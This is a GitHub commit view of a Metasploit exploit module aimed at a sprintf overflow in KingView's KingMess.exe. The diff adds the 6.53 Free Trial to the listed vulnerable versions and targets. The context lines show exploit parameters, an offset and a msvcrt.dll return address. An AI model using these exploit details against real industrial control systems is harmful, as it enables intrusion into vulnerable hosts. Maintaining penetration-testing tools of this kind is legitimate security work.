Skip to content

Commit 456e444

Browse files
author
jvazquez-r7
committed
definitely the free trial of 6.53 is also vulnerable
1 parent 5345af8 commit 456e444

File tree

1 file changed

+3
-2
lines changed

1 file changed

+3
-2
lines changed

modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb

Lines changed: 3 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -20,7 +20,8 @@ def initialize(info={})
2020
the KingMess.exe application when handling log files, due to the insecure usage of
2121
sprintf. This module uses a malformed .kvl file which must be opened by the victim
2222
via the KingMess.exe application, through the 'Browse Log Files' option. The module
23-
has been tested successfully on KingView 6.52 over Windows XP SP3.
23+
has been tested successfully on KingView 6.52 and KingView 6.53 Free Trial over
24+
Windows XP SP3.
2425
},
2526
'License' => MSF_LICENSE,
2627
'Author' =>
@@ -50,7 +51,7 @@ def initialize(info={})
5051
'Platform' => 'win',
5152
'Targets' =>
5253
[
53-
[ 'KingView 6.52 English / Kingmess.exe 65.20.2003.10300 / Windows XP SP3',
54+
[ 'KingView 6.52 English / KingView 6.53 Free Trial / Kingmess.exe 65.20.2003.10300 / Windows XP SP3',
5455
{
5556
'Offset' => 295,
5657
'Ret' => 0x77c35459 # push esp # ret # msvcrt.dll

0 commit comments

Comments
 (0)